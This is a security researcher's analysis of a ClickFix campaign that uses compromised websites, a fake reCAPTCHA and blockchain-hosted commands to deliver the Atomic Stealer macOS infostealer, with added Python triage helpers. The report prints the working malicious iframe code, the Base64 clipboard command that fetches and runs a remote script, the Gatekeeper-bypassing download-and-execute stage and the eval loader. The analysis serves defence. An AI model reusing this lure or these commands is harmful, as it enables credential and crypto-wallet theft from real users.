Introduction: From One Clue to a Global Campaign
As an independent cybersecurity researcher, I’m driven by the thrill of chasing down threats that exploit trust in clever ways. I am particularly interested in chasing "ClearFix" or "ClickFix" campaigns, as they are particularly effective at delivering malware and cause significant financial impact on ordinary individuals and companies alike. On May 4, 2025, I came across suspicious web activity that led me to agencia2.jornalfloripa[.]com.br, a legitimate Brazilian news site used to host a sophisticated watering hole attack delivering what I believe to be Atomic Stealer (AMOS), a dangerous macOS infostealer. This discovery was just the starting point. By digging deeper, I uncovered approximately 2,800 potentially compromised websites using the same malicious tactics (TTPs), pointing to a campaign of staggering scale. I will refer to this campaign as MacReaper.
This report details my investigation into this campaign, which uses a fake reCAPTCHA interface—known as ClickFix or ClearFix—alongside obfuscated JavaScript and Binance Smart Contracts in an EtherHiding scheme to deploy a Mach-O binary, confirmed as Atomic Stealer via VirusTotal (SHA-256: 9efddeb9e09eef067c3d2d307f38371ba0baf4c8fceaba01b9f007a50350a55c). Combining static analysis from Binary Ninja, dynamic insights from VirusTotal sandboxes, and critical research data from Censys and Onyphe—whom I thank for enabling such expansive investigations—I’ve mapped out the attack’s mechanics, from its social engineering stage to its blockchain-based command structure. This campaign, honed to target macOS users, is a wake-up call for defenders across the globe.
Executive Summary
The watering hole attack, first spotted on agencia2.jornalfloripa[.]com.br, targets macOS users with a ClickFix/ClearFix fake reCAPTCHA interface displayed only on macOS devices, identified via the User-Agent string sent to a third-party domain. Clicking “I’m not a robot” triggers a Binance Smart Contract, using an EtherHiding technique, to deliver a Base64-encoded command to the clipboard, which users are prompted to run in Terminal via macOS-specific shortcuts (⌘ + Space, ⌘ + V). This command downloads a script that retrieves and executes a Mach-O binary, confirmed as Atomic Stealer. The attack leverages obfuscated JavaScript, three full-screen iframes, and blockchain-based command infrastructure to maximize infections. After uncovering the initial site, I pivoted to identify ~2,800 potentially compromised websites employing the same delivery method, indicating a large-scale campaign. My analysis, blending Binary Ninja’s static insights with Censys/Onyphe data, reveals a C++-based binary that dynamically constructs commands for execution. This report provides a comprehensive breakdown of the attack’s components, tactics, techniques, and procedures (TTPs), IOCs, and recommendations for detection and mitigation, as well as steps to disrupt adversary activity.
Threat Overview: Atomic Stealer (AMOS)
Atomic Stealer, also known as AMOS, is a macOS-specific infostealer that surfaced in April 2023. Sold as a Malware-as-a-Service (MaaS) on Telegram for $1,000–$3,000 monthly, AMOS is built to steal sensitive data, including:
- Keychain Passwords: Extracts credentials stored in macOS Keychain, a goldmine for personal and corporate accounts.
- Browser Data: Harvests cookies, passwords, and autofill data from browsers like Chrome and Firefox.
- Cryptocurrency Wallets: Targets over 50 wallets and extensions, including Binance, Exodus, and Coinomi.
- System Information: Collects hardware UUID, CPU, RAM, and OS details using system_profiler.
- File Exfiltration: Downloads files from Desktop and Documents folders, often requesting user permission to blend in.
AMOS delivery thrives on social engineering, using tactics like ClickFix/ClearFix fake reCAPTCHAs to trick users into granting system access, often bypassing macOS Gatekeeper when running the downloaded binaries. Its distribution channels include fake websites, malvertising (e.g., Google Ads poisoning), and pirated software pushed on platforms like Reddit. The attack vector on agencia2.jornalfloripa[.]com.br, the first site I uncovered, employs these methods, kicking off a multi-stage infection chain that I traced to thousands of other potentially compromised sites.
Technical Analysis
Attack Delivery Mechanism
The investigation began with agencia2.jornalfloripa[.]com.br, a Brazilian news website compromised to serve as a watering hole (MITRE ATT&CK T1189). This initial find led to broader pivoting, revealing a campaign potentially spanning ~2,800 websites. The malicious infrastructure, embedded in the site’s HTML, includes:
- Three Full-Screen Iframes: Iframes (saved_resource(6).html, (7).html, (8).html) with z-index: 2147483647 blanket the page, ensuring visibility. One hosts the ClickFix/ClearFix fake reCAPTCHA interface.
- Obfuscated JavaScript: Two segments of encoded JavaScript, using Base64 and string arrays, set up the attack environment and likely trigger iframe injection.
- Binance Smart Contract Script: A script leverages Binance Smart Contracts in an EtherHiding scheme to deliver specific information and commands, enhancing stealth and resilience (whilst also limiting defenders’ pivoting capabilities).
- Cloudflare Challenge Iframe: A hidden iframe implements a Cloudflare challenge, likely to thwart automated analysis or bots.
The primary delivery mechanism is the ClickFix/ClearFix fake reCAPTCHA interface, which manipulates users into executing a malicious command.
ClickFix/ClearFix Fake reCAPTCHA Interface
The iframe, embedded as a full-screen overlay, mimics Google’s reCAPTCHA interface with striking accuracy:
<iframe srcdoc="<!DOCTYPE html>
<html lang='en'>
<head>
<meta charset='utf-8'>
<title>reCAPTCHA Verification</title>
<link rel='stylesheet' href='https://use.fontawesome.com/releases/v5.0.0/css/all.css'>
<script src='https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js'></script>
<style>
html,body{height:100%;margin:0;background:#fff;display:flex;justify-content:center;align-items:center;}
.C{font-family:Roboto,helvetica,arial,sans-serif}
.Z{margin:0;padding:0}
.B{display:block}
code{font-size:.92rem;margin-left:.13rem;color:gray;}
.L{line-height:normal}
.A{height:4.86rem;width:19.69rem;background:#f9f9f9;border-radius:.2rem;border:.07rem solid #d3d3d3;}
.A a{color:#555;text-decoration:none}
.A a:hover{text-decoration:underline}
.D{width:1.84rem;height:1.84rem}
.E{position:relative;background:#fff;border-radius:.13rem;width:100%;height:100%;border:.13rem solid #c1c1c1;margin:1.38rem 0 0 .79rem;outline:none;transition:width .5s,height .5s,border-radius .5s,margin-top .5s,margin-left .5s,opacity .7s;}
.E:hover{border:.13rem solid #b2b2b2}
.F{position:relative;left:3.41rem;bottom:.2rem;font-size:.98rem;color:#282727;}
.G{position:relative;left:15.58rem;bottom:2.36rem;height:2.95rem;vertical-align:baseline;padding-bottom:.26rem;}
.H{position:relative;color:#555;font-size:.53rem;text-align:center;bottom:2.63rem;left:7.35rem;}
.I{visibility:hidden;position:relative;top:-5.58rem;left:.79rem;width:1.31rem;height:1.31rem;border:.13rem solid rgba(0,0,0,.1);border-top:.13rem solid #333;border-radius:50%;opacity:0;transition:opacity .5s;animation:spin 1s linear infinite;}
@keyframes spin{0%{transform:rotate(0)}100%{transform:rotate(360deg)}}
.V{font-family:Roboto,helvetica,arial,sans-serif;opacity:0;position:absolute;visibility:hidden;margin:auto;background:#fff;border:.07rem solid #cecece;box-shadow:.33rem .39rem .46rem -.2rem rgba(0,0,0,.12);transition:opacity .4s;transform:scale(1.1);transform-origin:top left;}
ol{counter-reset:item;list-style:none;padding:0;}
ol li{counter-increment:item;margin-bottom:.66rem;}
ol li:before{content:counter(item) ". ";color:#1A73E8;font-weight:700;margin:0 .66rem;}
.W{padding:.53rem}
.X{background:#1A73E8;padding:1.05rem 1.05rem 1.58rem 1.05rem;color:#fff;}
.Xs{font-size:.92rem;line-height:normal}
.Xm{font-size:1.05rem}
.Xl{font-size:1.58rem;font-weight:700}
.Y{padding:.33rem;color:#111;font-size:.85rem}
.Zf{border-top:.07rem solid #cecece;padding:.66rem .46rem;color:#737373;display:grid;grid-template-columns:auto 6.69rem;font-size:.85rem;}
.Zl{padding:.33rem}
.U{background:#5a89e2;color:#fff;text-transform:uppercase;text-align:center;width:100%;padding:.79rem 0;border:none;outline:none;cursor:not-allowed;font-weight:600;font-size:.92rem;border-radius:.2rem;}
.U.B{height:min-content}
.fixed-width{width:30rem;word-wrap:break-word;overflow-wrap:break-word;}
</style>
<script>
fetch('https://technavix.cloud/popup',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({u:navigator.userAgent})});
</script>
</head>
<body>
<div class='C Z B'>
<div id='c' class='A Z B'>
<div class='D Z'>
<button id='b' class='E Z L'></button>
</div>
<p class='F Z L'>I'm not a robot</p>
<img class='G' src='https://upload.wikimedia.org/wikipedia/commons/thumb/8/83/ReCAPTCHA_icon.svg/220px-ReCAPTCHA_icon.svg.png'/>
<p class='H Z L'>
<a href='https://www.google.com/intl/en/policies/privacy/'>Privacy </a>
<a href='https://www.google.com/intl/en/policies/terms/'> Terms</a>
</p>
<img id='s' class='I'/>
</div>
<div id='v' class='V'>
<div class='W'>
<header class='X'>
<span class='Xm Z B'>Complete these</span>
<span class='Xl Z B'>Verification Steps</span>
</header>
<main class='Y'>
<p>To better prove you are not a robot, please:</p>
<ol>
<li>Press & hold the ⌘ <b>Command Key</b> + <b>Space</b> and input <b>'Terminal'</b>.</li>
<li>In the <b>'Terminal'</b> window, press ⌘ <b>Command Key</b> + <b>V</b>.</li>
<li>Press <b>Enter</b> on your keyboard to finish.</li>
</ol>
<p>You will observe and agree:<br>
<div class='fixed-width'><code><span id='i'>0</span></code></div>
</p>
</main>
<footer class='Zf W'>
<div class='Zl'>Perform the steps above to finish verification.</div>
<button id='bt' class='U B' disabled>Verify</button>
</footer>
</div>
</div>
</div>
<script>
const contractABI = [{'inputs': [], 'name': 'jadeCode', 'outputs': [{'internalType': 'string', 'name': '', 'type': 'string'}], 'stateMutability': 'view', 'type': 'function'}];
const contractAddress = '0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA';
const web3 = new Web3('https://bsc-dataseed.binance.org/');
const skylineContract = new web3.eth.Contract(contractABI, contractAddress);
async function getPearlTower() {
try {
const result = await skylineContract.methods.jadeCode().call();
return result;
} catch (error) {
console.error('Error fetching pearlTower:', error);
throw error;
}
}
let copyCommand;
getPearlTower().then(result => copyCommand = result);
const a = document.getElementById("c");
const b = document.getElementById("b");
const s = document.getElementById("s");
const v = document.getElementById("v");
addEventListener("click", e => {
const path = e.composedPath();
if (!path.includes(v) && v.style.display === "block") {
v.style.display = "none";
v.style.visibility = "hidden";
v.style.opacity = 0;
b.style.visibility = "visible";
b.style.opacity = 1;
b.disabled = false;
s.style.visibility = "hidden";
s.style.opacity = 0;
}
});
b.addEventListener("click", e => {
e.preventDefault();
b.disabled = true;
startLoading();
});
function startLoading() {
b.style.visibility = "hidden";
b.style.opacity = 0;
setTimeout(() => {
s.style.visibility = "visible";
s.style.opacity = 1;
}, 500);
setTimeout(showVerification, 900);
}
function showVerification() {
fetch('https://technavix.cloud/copy',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({u:navigator.userAgent})});
v.style.display = "block";
v.style.visibility = "visible";
v.style.opacity = 1;
v.style.top = a.offsetTop - 80 + "px";
v.style.left = a.offsetLeft + 54 + "px";
if (v.offsetTop < 5) v.style.top = "5px";
if (v.offsetLeft + v.offsetWidth > innerWidth - 10)
v.style.left = a.offsetLeft - 8 + "px";
const r = Math.floor(Math.random() * 9000 + 100000);
document.getElementById("i").textContent = copyCommand;
copyToClipboard(copyCommand);
}
function copyToClipboard(text) {
const x = document.createElement("textarea");
x.value = text;
document.body.append(x);
x.select();
document.execCommand("copy");
x.remove();
}
</script>
</body>
</html>
" style="width: 100%; height: 100%; border: none; position: fixed; top: 0px; left: 0px; z-index: 1000;"></iframe>
- Detailed Functionality:
  - Interface Design: The ClickFix/ClearFix iframe crafts a near-perfect replica of Google’s reCAPTCHA, using the Roboto font, Google’s reCAPTCHA logo (ReCAPTCHA_icon.svg), and privacy/terms links to Google’s policies for legitimacy (classic MO). The .A class shapes the reCAPTCHA box (19.69rem wide, 4.86rem high) with a light gray background and a subtle border. The .E class styles the interactive checkbox button, with hover effects shifting the border to a darker gray for realism.
  - Network Activity: On load, the iframe sends a POST request to technavix[.]cloud/popup with the user’s navigator.userAgent in JSON format ({u: navigator.userAgent}), likely to log the device type or confirm a macOS environment.
The following capture was collected while performing dynamic analysis of the website’s delivery function:


  - User Interaction: Clicking “I’m not a robot” (button#b) triggers startLoading(), which hides the button, shows a loading spinner (.I class, a rotating circle), and calls showVerification() after a 900ms delay to simulate processing. showVerification() sends a second POST to technavix[.]cloud/copy to log the clipboard action, then displays a verification dialog (.V class) instructing users to open Terminal (⌘ + Space), paste the command (⌘ + V), and press Enter. The dialog is positioned relative to the reCAPTCHA box (v.style.top, v.style.left), with adjustments for smaller screens.
  - Clipboard Manipulation: The script queries the Binance Smart Contract for the jadeCode method, stores the result in copyCommand, and copies it to the clipboard using copyToClipboard(). This function creates a temporary <textarea>, sets its value to the command, selects the text, executes the copy command, and removes the element.
  - Visual Feedback: The verification dialog includes a code block (<code><span id='i'>0</span></code>) displaying the copied command, reinforcing user trust in the “verification” process.
Command Copied to Clipboard:
The jadeCode method returns:
echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cHM6Ly9zYWxvcnR0YWN0aWNhbC50b3AvMi92ZXJpZnkuc2gpIg==' | base64 -D | sh
- Breakdown:
  - echo '...==': Outputs a Base64-encoded string.
  - base64 -D: Decodes it to:
/bin/bash -c "$(curl -fsSL https://salorttactical.top/2/verify.sh)"
  - sh: Executes the decoded command, which uses curl with the flags:
    - -f: Fails silently on server errors.
    - -s: Suppresses progress output.
    - -S: Shows errors if -f fails.
    - -L: Follows redirects.
  - The command fetches verify.sh from https://salorttactical[.]top/2/verify.sh and runs it via bash.
Second-Stage Command:
The verify.sh script executes:
curl -o /tmp/update https://salorttactical.top/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update
- Breakdown:
  - curl -o /tmp/update: Downloads the Atomic Stealer binary to /tmp/update from https://salorttactical[.]top/update.
  - xattr -c: Removes extended attributes, bypassing macOS Gatekeeper’s quarantine.
  - chmod +x: Grants execute permissions to the binary.
  - /tmp/update: Runs the binary, confirmed as Atomic Stealer (SHA-256: 9efddeb9e09eef067c3d2d307f38371ba0baf4c8fceaba01b9f007a50350a55c).
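As an added triage helper (not part of the original report or the campaign’s code), the Python script below peels the echo | base64 -D | sh wrapper from a captured clipboard command and lists the URLs, hostnames and staging idioms found in each decoded layer, using the two commands quoted above as sample input; the names peel(), domains() and Triage are assumptions of this example.

```python
"""Triage helper for ClickFix-style clipboard commands: unwrap the
`echo '<base64>' | base64 -D | sh` layer(s) and collect indicators from
every layer, so an analyst can block and hunt without executing anything."""
import base64
import re
from dataclasses import dataclass, field

# Sample inputs: the two commands quoted in this report.
CLIPBOARD_COMMAND = (
    "echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cHM6Ly9zYWxvcnR0YWN0aWNhbC50b3AvMi92ZXJpZnkuc2gpIg==' "
    "| base64 -D | sh"
)
VERIFY_SH = ("curl -o /tmp/update https://salorttactical.top/update && xattr -c /tmp/update "
             "&& chmod +x /tmp/update && /tmp/update")

# echo '<b64>' | base64 -D | sh   (macOS base64 uses -D, GNU coreutils uses -d)
_ECHO_B64 = re.compile(r"echo\s+'([A-Za-z0-9+/=]+)'\s*\|\s*base64\s+-[dD]\s*\|\s*(?:sh|bash)")
_URL = re.compile(r"""https?://[^\s"'()<>]+""")

# Idioms that mark a download-and-run stage on macOS, with the reason they matter.
SUSPICIOUS = {
    "curl -fsSL": "silent download piped straight into a shell",
    "xattr -c": "strips com.apple.quarantine so Gatekeeper never inspects the file",
    "chmod +x": "marks the dropped file executable",
    "/tmp/": "stages the payload in a world-writable temp path",
}


@dataclass
class Triage:
    stages: list = field(default_factory=list)    # decoded layers, outermost first
    urls: list = field(default_factory=list)
    findings: list = field(default_factory=list)


def peel(command: str) -> Triage:
    """Unwrap nested echo|base64|sh layers; collect URLs and idioms from each layer."""
    t = Triage()
    seen = set()
    while command not in seen:            # guard against a layer decoding to itself
        seen.add(command)
        t.stages.append(command)
        for url in _URL.findall(command):
            if url not in t.urls:
                t.urls.append(url)
        for needle, why in SUSPICIOUS.items():
            if needle in command and why not in t.findings:
                t.findings.append(why)
        m = _ECHO_B64.search(command)
        if not m:
            break
        command = base64.b64decode(m.group(1)).decode("utf-8", "replace")
    return t


def domains(t: Triage) -> list:
    """Hostnames from every layer, in first-seen order, for DNS/proxy blocklists."""
    out = []
    for url in t.urls:
        host = url.split("//", 1)[1].split("/", 1)[0].lower()
        if host not in out:
            out.append(host)
    return out


if __name__ == "__main__":
    for label, cmd in (("clipboard", CLIPBOARD_COMMAND), ("verify.sh", VERIFY_SH)):
        t = peel(cmd)
        print(f"[{label}] {len(t.stages)} layer(s)")
        for i, stage in enumerate(t.stages):
            print(f"  stage {i}: {stage}")
        print("  urls:    ", t.urls)
        print("  domains: ", domains(t))
        for why in t.findings:
            print("  !", why)
```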
EtherHiding with Binance Smart Contracts
The attack employs Binance Smart Contracts in an EtherHiding scheme, a technique where malicious commands are embedded in blockchain transactions to evade detection and resist takedowns. This approach enhances the attack’s stealth and operational resilience.
Primary Contract
- Address: 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA
- Method: jadeCode
- Execution Flow:
  - The iframe script initializes Web3.js to connect to the Binance Smart Chain (BSC) node at https://bsc-dataseed.binance.org/, a public endpoint for blockchain interactions. This is a similar MO/TTP to the one highlighted by Guard.io.
  - It defines the contract ABI, specifying the jadeCode method, which returns a string output.
  - The result is stored in copyCommand and copied to the clipboard via copyToClipboard(), ensuring seamless delivery to the user.
- Purpose:
  - Delivers the initial malicious command, encoded in Base64 to obscure its intent from static analysis tools.
  - Leverages EtherHiding by embedding the command in a blockchain transaction, making it resistant to traditional server takedowns.
  - Enables attackers to update the command (e.g., change URLs) by modifying the contract’s state, without altering the compromised website’s code.
One of the multiple calls:

The getPearlTower function asynchronously calls jadeCode, retrieving:
L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cHM6Ly9zYWxvcnR0YWN0aWNhbC50b3AvMi92ZXJpZnkuc2gpIg==
Which translates to:
/bin/bash -c "$(curl -fsSL https://salorttactical[.]top/2/verify.sh)"
Script:
const contractABI = [{'inputs': [], 'name': 'jadeCode', 'outputs': [{'internalType': 'string', 'name': '', 'type': 'string'}], 'stateMutability': 'view', 'type': 'function'}];
const contractAddress = '0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA';
const web3 = new Web3('https://bsc-dataseed.binance.org/');
const skylineContract = new web3.eth.Contract(contractABI, contractAddress);
async function getPearlTower() {
try {
const result = await skylineContract.methods.jadeCode().call();
return result;
} catch (error) {
console.error('Error fetching pearlTower:', error);
throw error;
}
}
let copyCommand;
getPearlTower().then(result => copyCommand = result);
Secondary Contract
- Address: 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53
- Execution Flow:
  - On page load (DOMContentLoaded), the script logs a message and connects to the BSC node using Web3.js.
  - Queries the contract for orchidABI (a compressed ABI string) and orchidAddress, which defines another contract’s location.
  - Decompresses orchidABI using pako.ungzip, parsing it into a JSON ABI to instantiate a new contract at orchidAddress.
  - Calls tokyoSkytree to retrieve decompressedScript, a Base64-encoded, gzipped JavaScript payload.
Part of the multiple calls to Binance also showed this:
H4sIAAXqE2gC/xXMQQ6CMBAAwOcsJJXe68l48yAm8IHaLrQGd5t2ITaEv6vzgJlQXGggiKRitBZ0gewWP51bePUa1P5GCewNPPphBBXQeszF7HBlEiQ5jTUhGLApLdFZiUz6VZjgUE/21dyG/t4VyZHmONVmX83/n61w7taC+TL/kqM92vMX6yc7YosAAAA=
Which translates to:
fetch('https://technavix[.]cloud/',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({u:navigator.userAgent})});
Note navigator.userAgent.
- Purpose:
  - Likely injects the ClickFix/ClearFix iframe, performs setup tasks (e.g., DOM manipulation), or conducts additional checks to ensure the attack targets macOS or Windows devices, by instructing the call to technavix[.]cloud.
  - The eval execution allows dynamic updates to the attack logic, enabling attackers to adapt without modifying the website’s static code.
  - Uses EtherHiding to embed the script in a blockchain transaction, further obscuring the attack’s infrastructure.
- Why EtherHiding?:
  - Stealth: Commands and scripts stored on the blockchain blend with legitimate Web3 traffic, evading traditional network monitoring.
  - Resilience: The decentralized BSC ensures commands remain accessible, even if traditional C2 servers are taken down.
  - Flexibility: Attackers can update contract data (e.g., new scripts or commands) without touching compromised websites, maintaining operational agility.
  - Obfuscation: Base64 encoding, gzip compression, and eval layers conceal the attack logic, complicating analysis by defenders.
Ref:

Script:
console.log('Start moving...');
document.addEventListener('DOMContentLoaded', async () => {
try {
const web3 = new Web3('https://bsc-dataseed.binance.org/');
const contract = new web3.eth.Contract([
{"inputs": [], "stateMutability": "nonpayable", "type": "constructor"},
{"inputs": [], "name": "orchidABI", "outputs": [{"internalType": "string", "name": "", "type": "string"}], "stateMutability": "view", "type": "function"},
{"inputs": [], "name": "orchidAddress", "outputs": [{"internalType": "string", "name": "", "type":"string"}], "stateMutability": "view", "type": "function"},
{"inputs": [], "name": "merlionABI", "outputs": [{"internalType": "string", "name": "", "type": "string"}], "stateMutability": "view", "type": "function"},
{"inputs": [], "name": "merlionAddress", "outputs": [{"internalType": "string", "name": "", "type":"string"}], "stateMutability": "view", "type": "function"},
], '0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53');
const orchidABI = JSON.parse(pako.ungzip(Uint8Array.from(atob(await contract.methods.orchidABI().call()), c => c.charCodeAt(0)), { to: 'string' }));
const orchidAddress = await contract.methods.orchidAddress().call();
const orchid = new web3.eth.Contract(orchidABI, orchidAddress);
const decompressedScript = pako.ungzip(Uint8Array.from(atob(await contract.methods.tokyoSkytree().call()), c => c.charCodeAt(0)), { to: 'string' });
eval(`(async () => { ${decompressedScript} })().then(() => { console.log('Moved.'); }).catch(console.error);`);
} catch (error) {
console.error('Road unavaible:', error);
}
});
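The atob() + pako.ungzip(..., {to: 'string'}) chain in the script above is reproduced here in Python as an added example (not the campaign’s or the report’s code), so a contract-returned payload such as the blob quoted earlier can be read offline instead of being handed to eval; unpack_payload, pack_payload, beacons and is_gzip_blob are names assumed by this example.

```python
"""Unpack the EtherHiding payload format seen in this campaign:
Base64 text -> gzip member -> JavaScript source, then list the URLs the
script would contact. Mirrors pako.ungzip(Uint8Array.from(atob(x), ...))."""
import base64
import gzip
import re

# Blob quoted in the report from the secondary-contract calls (page data).
PAGE_BLOB = ("H4sIAAXqE2gC/xXMQQ6CMBAAwOcsJJXe68l48yAm8IHaLrQGd5t2ITaEv6vzgJlQXGggiKRitBZ0gewW"
             "P51bePUa1P5GCewNPPphBBXQeszF7HBlEiQ5jTUhGLApLdFZiUz6VZjgUE/21dyG/t4VyZHmONVmX83/"
             "n61w7taC+TL/kqM92vMX6yc7YosAAAA=")
# The JavaScript the report says that blob decodes to (page data, undefanged).
PAGE_FETCH_LINE = ("fetch('https://technavix.cloud/',{method:'POST',headers:{'Content-Type':"
                   "'application/json'},body:JSON.stringify({u:navigator.userAgent})});")
# Constructed sample used to exercise the round trip (not from the page).
SAMPLE_SCRIPT = ("fetch('https://example.invalid/popup',{method:'POST',"
                 "body:JSON.stringify({u:navigator.userAgent})});")

GZIP_MAGIC = b"\x1f\x8b"


def is_gzip_blob(blob: str) -> bool:
    """True when the Base64 text decodes to something that starts with the gzip magic."""
    try:
        return base64.b64decode(blob, validate=True)[:2] == GZIP_MAGIC
    except ValueError:                       # binascii.Error is a ValueError subclass
        return False


def unpack_payload(blob: str) -> str:
    """base64 -> gunzip -> UTF-8; raises instead of guessing if the layer is not gzip."""
    raw = base64.b64decode(blob, validate=True)
    if raw[:2] != GZIP_MAGIC:
        raise ValueError("not a gzip member after Base64 decoding")
    return gzip.decompress(raw).decode("utf-8")


def pack_payload(script: str) -> str:
    """Inverse of unpack_payload, used only to verify the unpacker on constructed input."""
    return base64.b64encode(gzip.compress(script.encode("utf-8"))).decode("ascii")


_BEACON = re.compile(r"""fetch\(\s*['"](https?://[^'"]+)['"]""")


def beacons(script: str) -> list:
    """URLs passed to fetch() in the unpacked script, in source order."""
    return _BEACON.findall(script)


def mentions_user_agent(script: str) -> bool:
    return "navigator.userAgent" in script


if __name__ == "__main__":
    script = unpack_payload(PAGE_BLOB)
    print(script)
    print("beacons:", beacons(script), "| sends UA:", mentions_user_agent(script))
```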
macOS-Specific Targeting
The attack is meticulously designed to target macOS users, using a combination of client-side and server-side mechanisms to ensure the ClickFix/ClearFix interface is displayed only on macOS devices.
Client-Side Targeting
- Mechanism: The obfuscated JavaScript in the website’s HTML, particularly the first segment, likely performs a User-Agent check to identify macOS devices before injecting the ClickFix/ClearFix iframe. This check is not explicitly visible in the provided HTML or iframe code, indicating it resides within the Base64-decoded eval(E) payload or the decompressedScript from the secondary Binance contract.
- Evidence:
  - The ClickFix/ClearFix interface’s verification dialog uses macOS-specific shortcuts (⌘ + Space to open Spotlight, ⌘ + V to paste), clearly tailored for macOS users.
  - Testing confirms the same iframe does not appear on non-macOS devices (e.g., Windows, Linux), suggesting a client-side filter.
Edit: After a few days the actor also started targeting Windows devices by showing a different iframe.
- Implementation Details:
  - This obfuscation likely constructs the iframe dynamically, appending it to the DOM (document.body.appendChild) only for macOS User-Agents.
  - The eval(E) payload, derived from a Base64-decoded string (E = atob(Nn(...)...)), may contain logic to parse navigator.userAgent and trigger iframe injection.
  - The secondary contract’s decompressedScript, executed via eval, could include additional client-side checks, further hiding the targeting logic.
The first JavaScript segment defines a string array (Np) with terms like create, iframe, append, and document, encoded via functions such as i, Nn, and Nh:
const Np = ['dXRzI','table','aXAoV','ZyIsI','gwKSk','cifV0','n()\x20','uY2hh','eukue','mlldy',...];
JcXsUw="ZnVuY3Rpb24gTnkoTixiLEIsUSxTKXtyZXR1cm4gaShiLTB4MWY3LEIpO31...";
Server-Side Validation
- Function:
  - The server likely validates the User-Agent, responding only to macOS devices (e.g., those with “Macintosh” in the string).
  - The /popup request may confirm the device type before rendering the iframe, while /copy logs the clipboard action, potentially tracking successful infections.
- Evidence:
  - The exclusive use of macOS-specific shortcuts in the verification dialog suggests server-side filtering to deliver commands only to macOS users.
  - The dual POST requests indicate a server-side workflow that correlates User-Agent data with attack progression.
- Mechanism: The ClickFix/ClearFix iframe sends POST requests to technavix[.]cloud (/popup on load, /copy during verification) with the user’s navigator.userAgent:
fetch('https://technavix[.]cloud/popup', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({u: navigator.userAgent})
});
Targeting Precision
- The reliance on macOS shortcuts (⌘ + Space, ⌘ + V) is a deliberate choice, aligning with AMOS’s focus on macOS environments. The same behaviour has been observed on more than 600 hosts that I manually verified from the list provided at the end of this article.
- The absence of Windows- or Linux-specific instructions (e.g., Ctrl + V, Start menu) confirms the attack’s exclusivity.
Edit: After a few days the actor also started to target Windows devices, dynamically showing Windows or macOS instructions.
- The combination of obfuscated JavaScript and server-side validation minimizes exposure to non-target devices, reducing detection risks.

Atomic Stealer Binary Execution
The Mach-O binary, downloaded as /tmp/update, is a C++-based infostealer confirmed as Atomic Stealer through VirusTotal analysis (SHA-256: 9efddeb9e09eef067c3d2d307f38371ba0baf4c8fceaba01b9f007a50350a55c). Binary Ninja analysis offers detailed insights into its structure and behavior.
Binary Structure
- Type: Mach-O, x86_64 architecture, tailored for macOS systems.
- Libraries:
  - libc++.1.dylib: Provides C++ standard library functions for string manipulation and memory operations.
  - libSystem.B.dylib: Enables macOS system calls, including _system for command execution.
- Key Sections:
  - __text (0x100000680-0x100002f1a, 0x289a bytes): Contains executable code, including the main function sub_100000680.
  - __cstring (0x100003288-0x100003290, 8 bytes): A small string section, likely holding a short command or identifier.
  - __const (0x100003290-0x1000ab528, 0xa8298 bytes): A large read-only data section, possibly containing encrypted payloads or configuration data.
- Code Signature: Includes a valid signature (0x5f20 bytes), enabling the binary to bypass macOS Gatekeeper.
- UUID: e8633716-8673-317e-bcd4-2616e5956cef
Key Function: sub_100000680
- Purpose: Acts as the main function, constructing a string (likely a shell command) through bit manipulation and table lookups, executed via _system.
- Execution Flow:
  - Table Initialization: Calls sub_100000860 (invoking sub_100001a10, not provided) to set up a lookup table (var_38) with a size of 0x100 and a flag (var_3c set to 0xffffffff).
  - Table Construction: Iterates over a range determined by sub_100000890 (invoking sub_100002820, not provided), mapping indices to values in var_38 using sub_100000930 and sub_1000008e0.
  - String Construction:
    - Processes input data (arg2) via sub_1000009b0 and sub_100000a00, extracting bytes with sub_100000a90.
    - Maps each byte to an index (rax_17) in var_38 using sub_1000008e0.
    - Accumulates bits (var_50 << 6 | rax_17) and builds a std::string (arg1) by appending bytes (std::string::push_back) when enough bits are collected (i_1 >= 8).
    - Advances the input pointer with sub_100000ab0 until the loop condition (sub_100000a50) is met.
  - Cleanup and Return: Calls sub_100000ad0 to free the table and returns the constructed string (arg1).
- Purpose:
  - Constructs a command or payload, likely sourced from the __const section or runtime data, for execution via _system, a macOS system call from libSystem.B.dylib.
  - The command may initiate data theft, establish C2 communication, or fetch additional payloads.
- Malicious Capabilities (also as advertised on Telegram):
  - Keychain Access: Prompts users for passwords to unlock Keychain, extracting stored credentials.
  - Browser Data: Harvests cookies, passwords, and autofill data from Chrome, Firefox, and other browsers.
  - Cryptocurrency Wallets: Targets Binance, Exodus, and over 50 wallet extensions.
  - System Reconnaissance: Collects hardware and OS details using system_profiler.
  - File Exfiltration: Downloads files from Desktop and Documents, requesting user permission to appear legitimate.
High-Level Intermediate Language (HLIL):
void* sub_100000680(void* arg1, int64_t arg2, int64_t arg3)
{
void* var_10 = arg1;
int32_t var_3c = 0xffffffff;
void var_38;
sub_100000860(&var_38, 0x100, &var_3c); // Initializes lookup table
for (int64_t i = 0; i < sub_100000890(arg3); i += 1)
*sub_1000008e0(&var_38, zx.q(*sub_100000930(arg3, i))) = i.d; // Builds table
char var_49 = 0;
sub_100000990(arg1); // Initializes std::string
int32_t var_50 = 0;
int32_t i_1 = 0;
int64_t var_68 = sub_1000009b0(arg2);
int64_t var_70 = sub_100000a00(arg2);
while (((sub_100000a50(&var_68, &var_70) ^ 0xff) & 1) != 0)
{
char* rax_14;
rax_14.b = *sub_100000a90(&var_68); // Extracts input byte
int32_t rax_17 = *sub_1000008e0(&var_38, zx.q(rax_14.b)); // Maps byte to index
if (rax_17 >= 0)
{
var_50 = var_50 << 6 | rax_17; // Accumulates bits
i_1 += 6;
while (i_1 >= 8)
{
i_1 -= 8;
char var_79_1 = (var_50 >> i_1.b).b;
std::string::push_back(arg1.b); // Appends byte to command string
}
}
sub_100000ab0(&var_68); // Advances input pointer
}
